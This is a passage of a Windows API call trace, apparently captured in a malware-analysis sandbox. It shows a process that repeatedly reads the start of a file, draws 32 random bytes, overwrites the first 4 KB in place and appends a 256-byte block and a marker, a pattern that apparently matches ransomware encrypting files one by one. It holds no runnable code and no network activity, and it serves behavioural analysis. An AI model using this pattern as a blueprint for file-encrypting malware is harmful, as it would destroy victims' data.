1 [0083.554] GetProcessHeap () returned 0x4f10000 [0083.554] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.554] GetProcessHeap () returned 0x4f10000 [0083.554] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.554] GetProcessHeap () returned 0x4f10000 [0083.554] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.554] GetProcessHeap () returned 0x4f10000 [0083.554] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.554] GetProcessHeap () returned 0x4f10000 [0083.554] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.554] GetProcessHeap () returned 0x4f10000 [0083.554] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.554] GetProcessHeap () returned 0x4f10000 [0083.554] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0083.554] GetProcessHeap () returned 0x4f10000 [0083.554] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.554] GetProcessHeap () returned 0x4f10000 [0083.554] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0083.554] GetProcessHeap () returned 0x4f10000 [0083.554] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0083.554] GetProcessHeap () returned 0x4f10000 [0083.554] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0083.554] GetProcessHeap () returned 0x4f10000 [0083.554] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0083.554] SetFilePointerEx (in: hFile=0x94c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.554] WriteFile (in: hFile=0x94c, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0083.554] WriteFile (in: hFile=0x94c, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0083.555] GetProcessHeap () returned 0x4f10000 [0083.555] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0083.555] GetProcessHeap () returned 0x4f10000 [0083.555] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0083.555] GetProcessHeap () returned 0x4f10000 [0083.555] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0083.555] CloseHandle (hObject=0x94c) returned 1 [0083.556] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 115 [0083.556] SetFilePointerEx (in: hFile=0x950, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.556] ReadFile (in: hFile=0x950, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0083.556] SetFilePointerEx (in: hFile=0x950, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.556] GetProcessHeap () returned 0x4f10000 [0083.556] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0083.556] GetProcessHeap () returned 0x4f10000 [0083.556] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0083.556] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0083.557] GetProcessHeap () returned 0x4f10000 [0083.557] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0083.557] ReadFile (in: hFile=0x950, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x1000, lpOverlapped=0x0) returned 1 [0083.605] SetFilePointerEx (in: hFile=0x950, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.605] WriteFile (in: hFile=0x950, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x1000, lpOverlapped=0x0) returned 1 [0083.605] GetProcessHeap () returned 0x4f10000 [0083.605] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0083.605] GetProcessHeap () returned 0x4f10000 [0083.605] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.605] GetProcessHeap () returned 0x4f10000 [0083.605] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0083.605] GetProcessHeap () returned 0x4f10000 [0083.605] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.605] GetProcessHeap () returned 0x4f10000 [0083.605] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0083.605] GetProcessHeap () returned 0x4f10000 [0083.605] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.606] GetProcessHeap () returned 0x4f10000 [0083.606] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.606] GetProcessHeap () returned 0x4f10000 [0083.606] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.606] GetProcessHeap () returned 0x4f10000 [0083.606] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.606] GetProcessHeap () returned 0x4f10000 [0083.606] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.606] GetProcessHeap () returned 0x4f10000 [0083.606] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.606] GetProcessHeap () returned 0x4f10000 [0083.606] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.606] GetProcessHeap () returned 0x4f10000 [0083.606] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.606] GetProcessHeap () returned 0x4f10000 [0083.606] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.606] GetProcessHeap () returned 0x4f10000 [0083.606] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.606] GetProcessHeap () returned 0x4f10000 [0083.606] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.606] GetProcessHeap () returned 0x4f10000 [0083.606] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.606] GetProcessHeap () returned 0x4f10000 [0083.606] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.606] GetProcessHeap () returned 0x4f10000 [0083.606] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.606] GetProcessHeap () returned 0x4f10000 [0083.606] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.606] GetProcessHeap () returned 0x4f10000 [0083.606] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.606] GetProcessHeap () returned 0x4f10000 [0083.606] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.606] GetProcessHeap () returned 0x4f10000 [0083.606] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.606] GetProcessHeap () returned 0x4f10000 [0083.606] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.606] GetProcessHeap () returned 0x4f10000 [0083.606] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.606] GetProcessHeap () returned 0x4f10000 [0083.606] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.607] GetProcessHeap () returned 0x4f10000 [0083.607] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.607] GetProcessHeap () returned 0x4f10000 [0083.607] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.607] GetProcessHeap () returned 0x4f10000 [0083.607] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.607] GetProcessHeap () returned 0x4f10000 [0083.607] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.607] GetProcessHeap () returned 0x4f10000 [0083.607] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.607] GetProcessHeap () returned 0x4f10000 [0083.607] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.607] GetProcessHeap () returned 0x4f10000 [0083.607] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.607] GetProcessHeap () returned 0x4f10000 [0083.607] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.607] GetProcessHeap () returned 0x4f10000 [0083.607] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.607] GetProcessHeap () returned 0x4f10000 [0083.607] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.607] GetProcessHeap () returned 0x4f10000 [0083.607] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.607] GetProcessHeap () returned 0x4f10000 [0083.607] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.607] GetProcessHeap () returned 0x4f10000 [0083.607] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0083.607] GetProcessHeap () returned 0x4f10000 [0083.607] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.607] GetProcessHeap () returned 0x4f10000 [0083.607] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0083.607] GetProcessHeap () returned 0x4f10000 [0083.607] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0083.607] GetProcessHeap () returned 0x4f10000 [0083.607] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0083.607] GetProcessHeap () returned 0x4f10000 [0083.607] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0083.607] GetProcessHeap () returned 0x4f10000 [0083.607] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0083.607] GetProcessHeap () returned 0x4f10000 [0083.607] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0083.608] GetProcessHeap () returned 0x4f10000 [0083.608] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x1f8) returned 0x7cf6bf8 [0083.608] GetProcessHeap () returned 0x4f10000 [0083.608] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0083.608] GetProcessHeap () returned 0x4f10000 [0083.608] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.608] GetProcessHeap () returned 0x4f10000 [0083.608] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0083.608] GetProcessHeap () returned 0x4f10000 [0083.608] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.608] GetProcessHeap () returned 0x4f10000 [0083.608] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.608] GetProcessHeap () returned 0x4f10000 [0083.608] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.608] GetProcessHeap () returned 0x4f10000 [0083.608] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.608] GetProcessHeap () returned 0x4f10000 [0083.608] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.608] GetProcessHeap () returned 0x4f10000 [0083.608] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.608] GetProcessHeap () returned 0x4f10000 [0083.608] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.608] GetProcessHeap () returned 0x4f10000 [0083.608] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.608] GetProcessHeap () returned 0x4f10000 [0083.608] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.608] GetProcessHeap () returned 0x4f10000 [0083.608] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.608] GetProcessHeap () returned 0x4f10000 [0083.608] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.609] GetProcessHeap () returned 0x4f10000 [0083.609] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.609] GetProcessHeap () returned 0x4f10000 [0083.609] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.609] GetProcessHeap () returned 0x4f10000 [0083.609] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.609] GetProcessHeap () returned 0x4f10000 [0083.609] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.609] GetProcessHeap () returned 0x4f10000 [0083.609] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.609] GetProcessHeap () returned 0x4f10000 [0083.609] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.609] GetProcessHeap () returned 0x4f10000 [0083.609] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.609] GetProcessHeap () returned 0x4f10000 [0083.609] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.609] GetProcessHeap () returned 0x4f10000 [0083.609] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.609] GetProcessHeap () returned 0x4f10000 [0083.609] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.609] GetProcessHeap () returned 0x4f10000 [0083.609] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.609] GetProcessHeap () returned 0x4f10000 [0083.609] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0083.609] GetProcessHeap () returned 0x4f10000 [0083.609] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.609] GetProcessHeap () returned 0x4f10000 [0083.609] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0083.609] GetProcessHeap () returned 0x4f10000 [0083.609] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0083.609] GetProcessHeap () returned 0x4f10000 [0083.610] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0083.610] GetProcessHeap () returned 0x4f10000 [0083.610] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0083.610] SetFilePointerEx (in: hFile=0x950, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.610] WriteFile (in: hFile=0x950, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0083.610] WriteFile (in: hFile=0x950, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0083.610] GetProcessHeap () returned 0x4f10000 [0083.610] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0083.610] GetProcessHeap () returned 0x4f10000 [0083.610] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0083.610] GetProcessHeap () returned 0x4f10000 [0083.610] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0083.610] CloseHandle (hObject=0x950) returned 1 [0083.612] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 116 [0083.612] SetFilePointerEx (in: hFile=0x954, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.612] ReadFile (in: hFile=0x954, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0083.612] SetFilePointerEx (in: hFile=0x954, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.612] GetProcessHeap () returned 0x4f10000 [0083.612] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0083.612] GetProcessHeap () returned 0x4f10000 [0083.612] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0083.612] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0083.612] GetProcessHeap () returned 0x4f10000 [0083.612] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0083.612] ReadFile (in: hFile=0x954, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x1000, lpOverlapped=0x0) returned 1 [0083.669] SetFilePointerEx (in: hFile=0x954, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.669] WriteFile (in: hFile=0x954, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x1000, lpOverlapped=0x0) returned 1 [0083.670] GetProcessHeap () returned 0x4f10000 [0083.670] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0083.670] GetProcessHeap () returned 0x4f10000 [0083.670] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.670] GetProcessHeap () returned 0x4f10000 [0083.670] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0083.670] GetProcessHeap () returned 0x4f10000 [0083.670] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.670] GetProcessHeap () returned 0x4f10000 [0083.670] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0083.670] GetProcessHeap () returned 0x4f10000 [0083.670] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.670] GetProcessHeap () returned 0x4f10000 [0083.670] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.670] GetProcessHeap () returned 0x4f10000 [0083.670] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.670] GetProcessHeap () returned 0x4f10000 [0083.670] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.670] GetProcessHeap () returned 0x4f10000 [0083.670] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.670] GetProcessHeap () returned 0x4f10000 [0083.670] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.670] GetProcessHeap () returned 0x4f10000 [0083.670] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.670] GetProcessHeap () returned 0x4f10000 [0083.670] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.670] GetProcessHeap () returned 0x4f10000 [0083.670] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.670] GetProcessHeap () returned 0x4f10000 [0083.670] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.670] GetProcessHeap () returned 0x4f10000 [0083.670] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.670] GetProcessHeap () returned 0x4f10000 [0083.670] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.671] GetProcessHeap () returned 0x4f10000 [0083.671] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.671] GetProcessHeap () returned 0x4f10000 [0083.671] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.671] GetProcessHeap () returned 0x4f10000 [0083.671] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.671] GetProcessHeap () returned 0x4f10000 [0083.671] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.671] GetProcessHeap () returned 0x4f10000 [0083.671] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.671] GetProcessHeap () returned 0x4f10000 [0083.671] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.671] GetProcessHeap () returned 0x4f10000 [0083.671] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.671] GetProcessHeap () returned 0x4f10000 [0083.671] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.671] GetProcessHeap () returned 0x4f10000 [0083.671] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.671] GetProcessHeap () returned 0x4f10000 [0083.671] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.671] GetProcessHeap () returned 0x4f10000 [0083.671] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.671] GetProcessHeap () returned 0x4f10000 [0083.671] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.671] GetProcessHeap () returned 0x4f10000 [0083.671] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.671] GetProcessHeap () returned 0x4f10000 [0083.671] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.671] GetProcessHeap () returned 0x4f10000 [0083.671] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.671] GetProcessHeap () returned 0x4f10000 [0083.671] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.671] GetProcessHeap () returned 0x4f10000 [0083.671] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.671] GetProcessHeap () returned 0x4f10000 [0083.671] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.671] GetProcessHeap () returned 0x4f10000 [0083.671] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.671] GetProcessHeap () returned 0x4f10000 [0083.671] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.672] GetProcessHeap () returned 0x4f10000 [0083.672] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.672] GetProcessHeap () returned 0x4f10000 [0083.672] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0083.672] GetProcessHeap () returned 0x4f10000 [0083.672] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.672] GetProcessHeap () returned 0x4f10000 